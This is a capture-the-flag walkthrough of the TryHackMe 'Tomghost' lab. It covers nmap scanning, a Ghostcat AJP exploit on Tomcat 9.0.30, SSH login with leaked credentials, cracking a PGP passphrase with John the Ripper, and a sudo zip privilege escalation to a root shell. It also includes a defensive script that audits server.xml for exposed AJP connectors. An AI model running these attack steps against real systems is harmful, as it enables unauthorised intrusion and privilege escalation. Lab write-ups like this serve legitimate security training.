# Tomghost

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXgJgM5EOGIYda5WwD%2F-MbXgWA172zTcvDlhRsi%2Fimage.png?alt=media\&token=f090c9d5-9882-410e-a064-feb8285fabc9)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**):

```bash
nmap -Pn 10.10.193.3
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXgJgM5EOGIYda5WwD%2F-MbXi-v9YgcsteTqSJ6g%2Fimage.png?alt=media\&token=9df05d75-2788-45ff-8b93-5d08abf10ece)

Detailed nmap scan:

Command breakdown:

* **-sV**: service version detection
* **-sC**: default nmap scripts
* **-p**: specify the ports to scan (22, 53, 8009, 8080)
* **-oN nmap**: save the output in normal format to a file called `nmap`

```bash
nmap -sV -sC -p 22,53,8009,8080 -oN nmap 10.10.193.3
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXgJgM5EOGIYda5WwD%2F-MbXi3vfxltcWYt0b4zT%2Fimage.png?alt=media\&token=b34ad7de-0bb1-486b-a177-ba556ca0fe43)

## Enumeration

Let's visit the web server on port 8080.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXjG9JC-TUz-kOPBfx%2Fimage.png?alt=media\&token=ac9f6f48-0f2d-4a7e-8f39-b2954cc3c18c)

It's the Apache Tomcat/9.0.30 default page; we can't find anything interesting on it.

Let's look at the service running on port 8009, which is `ajp13` (Apache JServ Protocol): a binary protocol that lets a front-end web server reverse-proxy requests to an application server such as Tomcat. Let's look for exploits for this service.

```bash
searchsploit ajp
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXkxS54aHt9s6aa9A8%2Fimage.png?alt=media\&token=aae56c07-1600-4542-8fae-ea7daccd4328)

The second exploit in the list is the one we are looking for, so let's read it and see how to use it. To do this we first copy it to our working directory.

```bash
searchsploit -m multiple/webapps/48143.py
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXlLHG-gB0ZyjZ-K3M%2Fimage.png?alt=media\&token=b3becee6-cce4-43de-8fec-b5c65a7b2bee)
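From the defender's side, the reason port 8009 is a finding at all is that the AJP connector is reachable from the network and needs no shared secret. The following audit script is an added example, not part of the original writeup: it parses a Tomcat `server.xml` (a constructed sample is embedded) and flags AJP connectors that are not bound to loopback or have no `secret` set, beside a hardened connector for comparison.

```python
import xml.etree.ElementTree as ET

# Constructed sample server.xml: the kind of AJP connector this writeup relies
# on (all interfaces, no shared secret), a hardened AJP connector bound to
# loopback with a secret, and an ordinary HTTP connector that is out of scope.
SAMPLE_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <Connector port="8019" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="PLACEHOLDER-change-me"/>
  </Service>
</Server>
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list[dict]:
    """Return one finding per AJP connector, listing why it is risky (if it is).

    An AJP connector is only reasonable to leave enabled when it listens on a
    loopback address AND the front-end proxy must present a shared secret.
    """
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        protocol = conn.get("protocol", "HTTP/1.1")
        if not protocol.upper().startswith("AJP"):
            continue  # HTTP connectors are not what this check is about
        # Before Tomcat 9.0.31 a missing address attribute means all interfaces.
        address = conn.get("address", "0.0.0.0")
        reasons = []
        if address not in LOOPBACK:
            reasons.append(f"listens on {address} instead of loopback")
        # secretRequired only defaults to true from Tomcat 9.0.31 onward; the
        # target here runs 9.0.30, so a connector without a secret is open.
        if not conn.get("secret") or conn.get("secretRequired", "true").lower() == "false":
            reasons.append("no shared secret required from the proxy")
        findings.append({
            "port": int(conn.get("port", "0")),
            "risky": bool(reasons),
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for finding in audit_ajp_connectors(SAMPLE_SERVER_XML):
        print(finding)
```

If the AJP connector is not used at all (no front-end proxy), the simplest fix is to remove or comment out the `AJP/1.3` `<Connector>` line entirely.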

## Exploitation

Looking at the exploit, it seems we only need to run it against the IP of the target machine.

```bash
python 48143.py 10.10.193.3
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXlw904mqx53LOy8RJ%2Fimage.png?alt=media\&token=02c4bc86-9c99-419d-bacb-b7d66456116a)

And we found credentials, which we can use to log in over SSH.

```bash
ssh skyfuck@10.10.193.3
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXmDWKeSXrpbhPKT_r%2Fimage.png?alt=media\&token=ef31c04d-c25e-4b79-a7b5-9ed03d6dfa17)

We can read the user flag file, which can be located with this command:

```bash
find / -type f -name user.txt 2>/dev/null
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXrcigiT-QyopG9jEH%2Fimage.png?alt=media\&token=a91973f7-16ba-43d5-a163-6b67d9c35847)

## Privilege Escalation

Looking in the current directory, there are two files.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXnP9ZNWPviWDYoGlO%2Fimage.png?alt=media\&token=ebf39804-863c-45d4-a215-8e9cce7b9a26)

One is credential.pgp, an encrypted PGP (Pretty Good Privacy) file. The other is tryhackme.asc, an ASCII-armoured (`.asc`) PGP file.

First we import the `asc` file, then try to decrypt `credential.pgp`.

```bash
gpg --import tryhackme.asc
```

```bash
gpg --decrypt credential.pgp
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXoiHBjCUI_UaHN3_c%2Fimage.png?alt=media\&token=290213f1-f1c9-4fb2-8c79-13dd6288ac7e)

It looks like we need a passphrase, so let's first copy the key file to our machine and then crack the passphrase with `John the Ripper`.

```bash
scp skyfuck@10.10.193.3:/home/skyfuck/tryhackme.asc .
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXpc14rNurYaTdJGQe%2Fimage.png?alt=media\&token=6eb0baad-db1d-41bd-adf9-0edab3ca9df4)

Next we extract the hash with `gpg2john` and then crack it with `john`.

```bash
gpg2john tryhackme.asc > hash
```

```bash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXtpC5bcQ_pvmHajPr%2Fimage.png?alt=media\&token=bb4253a6-d1ca-4741-a0fc-fae48a962787)

After cracking it you get the passphrase `alexandru`.

Now you can decrypt the PGP file.

```bash
gpg --decrypt credential.pgp
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXu8AaLbbakfb8RZ3M%2Fimage.png?alt=media\&token=9355c75d-be68-4117-84eb-54597357c7ad)

We found credentials for another user, so let's switch to merlin.

```bash
su merlin
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXuB4iBgG49ogiewbW%2F-MbXuTprUPT15mwiu9Cg%2Fimage.png?alt=media\&token=d6332420-039f-40b1-b748-c4115c329198)

Let's run `sudo -l` to see what we are allowed to run as root.

```bash
sudo -l
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXuB4iBgG49ogiewbW%2F-MbXuhL5C233xWxvBepp%2Fimage.png?alt=media\&token=c98b774b-b786-43ed-b12b-542533dab644)

Looks like we can run `/usr/bin/zip` as root, so let's go to [GTFOBins](https://gtfobins.github.io/gtfobins/zip/#sudo) and look up the commands to escalate privileges to root.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXuB4iBgG49ogiewbW%2F-MbXv7mXXIO8ZhHasEIU%2Fimage.png?alt=media\&token=564e0e33-12fc-47d0-9fa7-d5649507baed)

Once we run these commands we get a root shell.

```bash
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXuB4iBgG49ogiewbW%2F-MbXvSgTJiRJoTA_Vqib%2Fimage.png?alt=media\&token=eca40433-07ad-4859-b645-ed6a9423ee21)

We are now root and can read root.txt to answer the last question of this room.
